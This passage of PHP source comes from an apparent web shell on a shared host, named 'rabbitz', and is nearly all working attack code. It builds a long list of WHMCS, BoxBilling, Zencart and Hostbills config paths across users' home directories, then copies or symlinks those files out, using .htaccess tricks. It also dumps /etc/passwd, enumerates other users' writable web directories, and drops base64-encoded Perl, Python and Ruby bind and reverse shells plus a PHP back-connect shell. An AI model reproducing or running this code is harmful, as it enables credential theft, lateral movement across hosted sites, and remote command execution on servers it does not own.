  1549. "/home/$user_rabbitz/public_html/CART/submitticket.php" => "WHMCS",
  1550. "/home/$user_rabbitz/public_html/Cart/submitticket.php" => "WHMCS",
  1551. "/home/$user_rabbitz/public_html/cart/submitticket.php" => "WHMCS",
  1552. "/home/$user_rabbitz/public_html/ORDER/submitticket.php" => "WHMCS",
  1553. "/home/$user_rabbitz/public_html/Order/submitticket.php" => "WHMCS",
  1554. "/home/$user_rabbitz/public_html/order/submitticket.php" => "WHMCS",
  1555. "/home/$user_rabbitz/public_html/CLIENT/submitticket.php" => "WHMCS",
  1556. "/home/$user_rabbitz/public_html/Client/submitticket.php" => "WHMCS",
  1557. "/home/$user_rabbitz/public_html/client/submitticket.php" => "WHMCS",
  1558. "/home/$user_rabbitz/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  1559. "/home/$user_rabbitz/public_html/Clientarea/submitticket.php" => "WHMCS",
  1560. "/home/$user_rabbitz/public_html/clientarea/submitticket.php" => "WHMCS",
  1561. "/home/$user_rabbitz/public_html/SUPPORT/submitticket.php" => "WHMCS",
  1562. "/home/$user_rabbitz/public_html/Support/submitticket.php" => "WHMCS",
  1563. "/home/$user_rabbitz/public_html/support/submitticket.php" => "WHMCS",
  1564. "/home/$user_rabbitz/public_html/BILLING/submitticket.php" => "WHMCS",
  1565. "/home/$user_rabbitz/public_html/Billing/submitticket.php" => "WHMCS",
  1566. "/home/$user_rabbitz/public_html/billing/submitticket.php" => "WHMCS",
  1567. "/home/$user_rabbitz/public_html/BUY/submitticket.php" => "WHMCS",
  1568. "/home/$user_rabbitz/public_html/Buy/submitticket.php" => "WHMCS",
  1569. "/home/$user_rabbitz/public_html/buy/submitticket.php" => "WHMCS",
  1570. "/home/$user_rabbitz/public_html/MANAGE/submitticket.php" => "WHMCS",
  1571. "/home/$user_rabbitz/public_html/Manage/submitticket.php" => "WHMCS",
  1572. "/home/$user_rabbitz/public_html/manage/submitticket.php" => "WHMCS",
  1573. "/home/$user_rabbitz/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  1574. "/home/$user_rabbitz/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1575. "/home/$user_rabbitz/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1576. "/home/$user_rabbitz/public_html/clientsupport/submitticket.php" => "WHMCS",
  1577. "/home/$user_rabbitz/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1578. "/home/$user_rabbitz/public_html/Checkout/submitticket.php" => "WHMCS",
  1579. "/home/$user_rabbitz/public_html/checkout/submitticket.php" => "WHMCS",
  1580. "/home/$user_rabbitz/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1581. "/home/$user_rabbitz/public_html/Billings/submitticket.php" => "WHMCS",
  1582. "/home/$user_rabbitz/public_html/billings/submitticket.php" => "WHMCS",
  1583. "/home/$user_rabbitz/public_html/BASKET/submitticket.php" => "WHMCS",
  1584. "/home/$user_rabbitz/public_html/Basket/submitticket.php" => "WHMCS",
  1585. "/home/$user_rabbitz/public_html/basket/submitticket.php" => "WHMCS",
  1586. "/home/$user_rabbitz/public_html/SECURE/submitticket.php" => "WHMCS",
  1587. "/home/$user_rabbitz/public_html/Secure/submitticket.php" => "WHMCS",
  1588. "/home/$user_rabbitz/public_html/secure/submitticket.php" => "WHMCS",
  1589. "/home/$user_rabbitz/public_html/SALES/submitticket.php" => "WHMCS",
  1590. "/home/$user_rabbitz/public_html/Sales/submitticket.php" => "WHMCS",
  1591. "/home/$user_rabbitz/public_html/sales/submitticket.php" => "WHMCS",
  1592. "/home/$user_rabbitz/public_html/BILL/submitticket.php" => "WHMCS",
  1593. "/home/$user_rabbitz/public_html/Bill/submitticket.php" => "WHMCS",
  1594. "/home/$user_rabbitz/public_html/bill/submitticket.php" => "WHMCS",
  1595. "/home/$user_rabbitz/public_html/PURCHASE/submitticket.php" => "WHMCS",
  1596. "/home/$user_rabbitz/public_html/Purchase/submitticket.php" => "WHMCS",
  1597. "/home/$user_rabbitz/public_html/purchase/submitticket.php" => "WHMCS",
  1598. "/home/$user_rabbitz/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  1599. "/home/$user_rabbitz/public_html/Account/submitticket.php" => "WHMCS",
  1600. "/home/$user_rabbitz/public_html/account/submitticket.php" => "WHMCS",
  1601. "/home/$user_rabbitz/public_html/USER/submitticket.php" => "WHMCS",
  1602. "/home/$user_rabbitz/public_html/User/submitticket.php" => "WHMCS",
  1603. "/home/$user_rabbitz/public_html/user/submitticket.php" => "WHMCS",
  1604. "/home/$user_rabbitz/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1605. "/home/$user_rabbitz/public_html/Clients/submitticket.php" => "WHMCS",
  1606. "/home/$user_rabbitz/public_html/clients/submitticket.php" => "WHMCS",
  1607. "/home/$user_rabbitz/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1608. "/home/$user_rabbitz/public_html/Billings/submitticket.php" => "WHMCS",
  1609. "/home/$user_rabbitz/public_html/billings/submitticket.php" => "WHMCS",
  1610. "/home/$user_rabbitz/public_html/MY/submitticket.php" => "WHMCS",
  1611. "/home/$user_rabbitz/public_html/My/submitticket.php" => "WHMCS",
  1612. "/home/$user_rabbitz/public_html/my/submitticket.php" => "WHMCS",
  1613. "/home/$user_rabbitz/public_html/secure/whm/submitticket.php" => "WHMCS",
  1614. "/home/$user_rabbitz/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1615. "/home/$user_rabbitz/public_html/panel/submitticket.php" => "WHMCS",
  1616. "/home/$user_rabbitz/public_html/clientes/submitticket.php" => "WHMCS",
  1617. "/home/$user_rabbitz/public_html/cliente/submitticket.php" => "WHMCS",
  1618. "/home/$user_rabbitz/public_html/support/order/submitticket.php" => "WHMCS",
  1619. "/home/$user_rabbitz/public_html/bb-config.php" => "BoxBilling",
  1620. "/home/$user_rabbitz/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1621. "/home/$user_rabbitz/public_html/box/bb-config.php" => "BoxBilling",
  1622. "/home/$user_rabbitz/public_html/host/bb-config.php" => "BoxBilling",
  1623. "/home/$user_rabbitz/public_html/Host/bb-config.php" => "BoxBilling",
  1624. "/home/$user_rabbitz/public_html/supportes/bb-config.php" => "BoxBilling",
  1625. "/home/$user_rabbitz/public_html/support/bb-config.php" => "BoxBilling",
  1626. "/home/$user_rabbitz/public_html/hosting/bb-config.php" => "BoxBilling",
  1627. "/home/$user_rabbitz/public_html/cart/bb-config.php" => "BoxBilling",
  1628. "/home/$user_rabbitz/public_html/order/bb-config.php" => "BoxBilling",
  1629. "/home/$user_rabbitz/public_html/client/bb-config.php" => "BoxBilling",
  1630. "/home/$user_rabbitz/public_html/clients/bb-config.php" => "BoxBilling",
  1631. "/home/$user_rabbitz/public_html/cliente/bb-config.php" => "BoxBilling",
  1632. "/home/$user_rabbitz/public_html/clientes/bb-config.php" => "BoxBilling",
  1633. "/home/$user_rabbitz/public_html/billing/bb-config.php" => "BoxBilling",
  1634. "/home/$user_rabbitz/public_html/billings/bb-config.php" => "BoxBilling",
  1635. "/home/$user_rabbitz/public_html/my/bb-config.php" => "BoxBilling",
  1636. "/home/$user_rabbitz/public_html/secure/bb-config.php" => "BoxBilling",
  1637. "/home/$user_rabbitz/public_html/support/order/bb-config.php" => "BoxBilling",
  1638. "/home/$user_rabbitz/public_html/includes/dist-configure.php" => "Zencart",
  1639. "/home/$user_rabbitz/public_html/zencart/includes/dist-configure.php" => "Zencart",
  1640. "/home/$user_rabbitz/public_html/products/includes/dist-configure.php" => "Zencart",
  1641. "/home/$user_rabbitz/public_html/cart/includes/dist-configure.php" => "Zencart",
  1642. "/home/$user_rabbitz/public_html/shop/includes/dist-configure.php" => "Zencart",
  1643. "/home/$user_rabbitz/public_html/includes/iso4217.php" => "Hostbills",
  1644. "/home/$user_rabbitz/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1645. "/home/$user_rabbitz/public_html/host/includes/iso4217.php" => "Hostbills",
  1646. "/home/$user_rabbitz/public_html/Host/includes/iso4217.php" => "Hostbills",
  1647. "/home/$user_rabbitz/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1648. "/home/$user_rabbitz/public_html/support/includes/iso4217.php" => "Hostbills",
  1649. "/home/$user_rabbitz/public_html/hosting/includes/iso4217.php" => "Hostbills",
  1650. "/home/$user_rabbitz/public_html/cart/includes/iso4217.php" => "Hostbills",
  1651. "/home/$user_rabbitz/public_html/order/includes/iso4217.php" => "Hostbills",
  1652. "/home/$user_rabbitz/public_html/client/includes/iso4217.php" => "Hostbills",
  1653. "/home/$user_rabbitz/public_html/clients/includes/iso4217.php" => "Hostbills",
  1654. "/home/$user_rabbitz/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1655. "/home/$user_rabbitz/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1656. "/home/$user_rabbitz/public_html/billing/includes/iso4217.php" => "Hostbills",
  1657. "/home/$user_rabbitz/public_html/billings/includes/iso4217.php" => "Hostbills",
  1658. "/home/$user_rabbitz/public_html/my/includes/iso4217.php" => "Hostbills",
  1659. "/home/$user_rabbitz/public_html/secure/includes/iso4217.php" => "Hostbills",
  1660. "/home/$user_rabbitz/public_html/support/order/includes/iso4217.php" => "Hostbills"
  1661. );  
  1662.  
  1663. foreach($grab_config as $config => $nama_config) {
  1664.     if($_POST['config'] == 'grab') {
  1665. $ambil_config = file_get_contents($config);
  1666. if($ambil_config == '') {
  1667. } else {
  1668. $file_config = fopen("rabbitz_configgrab/$user_rabbitz-$nama_config.txt","w");
  1669. fputs($file_config,$ambil_config);
  1670. }
  1671. }
  1672. if($_POST['config'] == 'c') {
  1673. @symlink($config,"rabbitz_Symconfig/".$user_rabbitz."-".$nama_config.".txt");
  1674. }
  1675. if($_POST['config'] == '404') {
  1676. $sym404=symlink($config,"rabbitz_sym404/".$user_rabbitz."-".$nama_config.".txt");
  1677. if($sym404){
  1678.     @mkdir("rabbitz_sym404/".$user_rabbitz."-".$nama_config.".txt404", 0777);
  1679.     $htaccess="Options Indexes FollowSymLinks
  1680. DirectoryIndex rabbitz.htm
  1681. HeaderName rabbitz.txt
  1682. Satisfy Any
  1683. IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
  1684. IndexIgnore *";
  1685.  
  1686. @file_put_contents("rabbitz_sym404/".$user_rabbitz."-".$nama_config.".txt404/.htaccess",$htaccess);
  1687.  
  1688. @symlink($config,"rabbitz_sym404/".$user_rabbitz."-".$nama_config.".txt404/rabbitz.txt");
  1689.  
  1690.     }
  1691.  
  1692. }
  1693.  
  1694.                     }    
  1695.         }  if($_POST['config'] == 'grab') {
  1696.             echo "<center><a href='?path=$path/rabbitz_configgrab'><font color=lime>Done</font></a></center>";
  1697.         }
  1698.     if($_POST['config'] == '404') {
  1699.         echo "<center>
  1700. <a href=\"rabbitz_sym404/root/\">SymlinkNya</a>
  1701. <br><a href=\"rabbitz_sym404/\">Configurations</a></center>";
  1702.     }
  1703.      if($_POST['config'] == 'c') {
  1704. echo "<center>
  1705. <a href=\"rabbitz_symconfig/root/\">Symlinknya</a>
  1706. <br><a href=\"rabbitz_symconfig/\">Configurations</a></center>";
  1707.             }if($_POST['config'] == 'symvhost') {
  1708. echo "<center>
  1709. <a href=\"rabbitz_symvhost/root/\">Root Server</a>
  1710. <br><a href=\"rabbitz_symvhost/\">Configurations</a></center>";
  1711.             }
  1712.        
  1713.        
  1714.         }else{
  1715.         echo "<form method=\"post\" action=\"\"><center>
  1716.         </center></select><br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  1717.         echo include("/etc/passwd");
  1718.         echo "</textarea><br><br>
  1719.         <select class=\"select\" name=\"config\"  style=\"width: 450px;\" height=\"10\">
  1720.         <option value=\"grab\">Config Grab</option>
  1721.         <option value=\"symlink\">Symlink Config</option>
  1722.         <option value=\"404\">Config 404</option>
  1723.         <option value=\"symvhosts\">Vhosts Config Grabber</option><br><br><input type=\"submit\" value=\"Start!!\"></td></tr></center>\n";
  1724. }
  1725. } elseif($_GET['c'] == 'jumping') {
  1726.     $i = 0;
  1727.     echo "<pre><div class='margin: 5px auto;'>";
  1728.     $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  1729.     while($passwd = fgets($etc)) {
  1730.         if($passwd == '' || !$etc) {
  1731.             echo "<font color=red>Can't read /etc/passwd</font>";
  1732.         } else {
  1733.             preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1734.             foreach($user_jumping[1] as $user_rabbitz_jump) {
  1735.                 $user_jumping_dir = "/home/$user_rabbitz_jump/public_html";
  1736.                 if(is_readable($user_jumping_dir)) {
  1737.                     $i++;
  1738.                     $jrw = "[<font color=white>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1739.                     if(is_writable($user_jumping_dir)) {
  1740.                         $jrw = "[<font color=white>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1741.                     }
  1742.                     echo $jrw;
  1743.                     if(function_exists('posix_getpwuid')) {
  1744.                         $domain_jump = file_get_contents("/etc/named.conf");   
  1745.                         if($domain_jump == '') {
  1746.                             echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1747.                         } else {
  1748.                             preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1749.                             foreach($domains_jump[1] as $dj) {
  1750.                                 $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1751.                                 $user_jumping_url = $user_jumping_url['name'];
  1752.                                 if($user_jumping_url == $user_rabbitz_jump) {
  1753.                                     echo " => ( <u>$dj</u> )<br>";
  1754.                                     break;
  1755.                                 }
  1756.                             }
  1757.                         }
  1758.                     } else {
  1759.                         echo "<br>";
  1760.                     }
  1761.                 }
  1762.             }
  1763.         }
  1764.     }
  1765.     if($i == 0) {
  1766.     } else {
  1767.         echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  1768.     }
  1769.     echo "</div></pre>";
  1770. } elseif($_GET['c'] == 'tool'){
  1771. echo "<br><br><center><form method=post>
  1772. <br>    <span>Bind port to /bin/sh [Perl]</span><br/>
  1773.     Port: <input type='text' name='port' value='443'> <input type=submit name=bpl value='>>'>
  1774. <br><br>
  1775.         <span>Back-connect</span><br/>
  1776.     Server: <input type='text' name='server' placeholder='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' placeholder='443'><select class='select' name='c'  style='width: 100px;' height='10'><option value='perl'>Perl</option><option value='php'>PHP</option><option value='python'>Python</option><option value='ruby'>Ruby</option></select>
  1777.    <input type=submit value='>>'>";
  1778.     if($_POST['bpl']) {
  1779.     $bp=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=");
  1780.     $brt=@fopen('bp.pl','w');
  1781. fwrite($brt,$bp);
  1782. $out = exe("perl bp.pl ".$_POST['port']." 1>/dev/null 2>&1 &");
  1783. sleep(1);
  1784. echo "<pre>$out\n".exe("ps aux | grep bp.pl")."</pre>";
  1785. unlink("bp.pl");
  1786.         }
  1787.         if($_POST['c'] == 'perl') {
  1788. $bc=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");
  1789. $plbc=@fopen('bc.pl','w');
  1790. fwrite($plbc,$bc);
  1791. $out = exe("perl bc.pl ".$_POST['server']." ".$_POST['port']." 1>/dev/null 2>&1 &");
  1792. sleep(1);
  1793. echo "<pre>$out\n".exe("ps aux | grep bc.pl")."</pre>";
  1794. unlink("bc.pl");
  1795. }
  1796. if($_POST['c'] == 'python') {
  1797. $becaa=base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBDb243ZXh0IC0gWGFpIFN5bmRpY2F0ZVxuVGhhbmtzIEdvb2dsZSBGb3IgUmVmZXJlbnNpXG5cbicnJykNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDEpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMikNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwzKQ0KICAgIHNoZWxsID0gc3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pDQogIGV4Y2VwdCBzb2NrZXQudGltZW91dDoNCiAgICBwcmludCAiVGltT3V0Ig0KICBleGNlcHQgc29ja2V0LmVycm9yLCBlOg0KICAgIHByaW50ICJFcnJvciIsIGUNCnB5YmFja2Nvbm5lY3QoKQ==");
  1798. $pbcaa=@fopen('bcpyt.py','w');
  1799. fwrite($pbcaa,$becaa);
  1800. $out1 = exe("python bcpyt.py ".$_POST['server']." ".$_POST['port']);
  1801. sleep(1);
  1802. echo "<pre>$out1\n".exe("ps aux | grep bcpyt.py")."</pre>";
  1803. unlink("bcpyt.py");
  1804. }
  1805. if($_POST['c'] == 'ruby') {
  1806. $becaak=base64_decode("IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k");
  1807. $pbcaak=@fopen('bcruby.rb','w');
  1808. fwrite($pbcaak,$becaak);
  1809. $out2 = exe("ruby bcruby.rb ".$_POST['server']." ".$_POST['port']);
  1810. sleep(1);
  1811. echo "<pre>$out2\n".exe("ps aux | grep bcruby.rb")."</pre>";
  1812. unlink("bcruby.rb");
  1813. }
  1814. if($_POST['c'] == 'php') {
  1815.             $ip = $_POST['server'];
  1816.             $port = $_POST['port'];
  1817.             $sockfd = fsockopen($ip , $port , $errno, $errstr );
  1818.             if($errno != 0){
  1819.               echo "<font color='red'>$errno : $errstr</font>";
  1820.             } else if (!$sockfd)  {
  1821.               $result = "<p>Unexpected error has occured, connection may have failed.</p>";
  1822.             } else {
  1823.               fputs ($sockfd ,"
  1824.                 \n{################################################################}
  1825.                 \n..:: BackConnect Php By Con7ext ::..
  1826.                 \n{################################################################}\n");
  1827.               $dir = shell_exec("pwd");
  1828.               $sysinfo = shell_exec("uname -a");
  1829.               $time = Shell_exec("time");
  1830.               $len = 1337;
  1831.               fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
  1832.               while(!feof($sockfd)){ $cmdPrompt = '[Con7ext]#:> ';
  1833.               fputs ($sockfd , $cmdPrompt );
  1834.               $command= fgets($sockfd, $len);
  1835.               fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
  1836.             }
  1837.             fclose($sockfd);
  1838.             }
  1839.           }
  1840.         echo "</p></div>";
  1841. }
  1842.  
  1843. elseif($_GET['c'] == 'userchanger') {
  1844.     if($_POST['hajar']) {
  1845.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1846.             echo "username atau password harus lebih dari 6 karakter";
  1847.         } else {
  1848.             $user_baru = $_POST['user_baru'];
  1849.             $pass_baru = md5($_POST['pass_baru']);
